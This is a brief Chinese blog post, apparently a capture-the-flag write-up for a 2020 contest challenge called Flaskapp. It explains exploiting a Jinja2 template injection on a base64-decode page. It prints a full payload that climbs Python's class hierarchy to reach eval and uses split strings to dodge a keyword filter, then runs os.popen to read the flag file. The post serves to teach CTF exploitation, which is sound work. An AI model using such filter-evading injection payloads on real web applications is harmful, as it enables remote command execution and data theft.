刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

2020年新春战“疫”—网络安全公益赛 Web Flaskapp Writeup(base64解码ssti)

image.png


模板注入漏洞,在base64解码页面上,先加密payload

{{{}.__class__.__base__.__subclasses__()[103].__init__.__globals__['__builtins__']['ev'+'al']("__imp"+"ort_"+"_('o"+"s').po"+"pen('cat this_is_the_fl"+"ag.txt').read()")}}

image.png

然后复制加密后的字符串到解码页面,得到flag

image.png

发表评论:

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.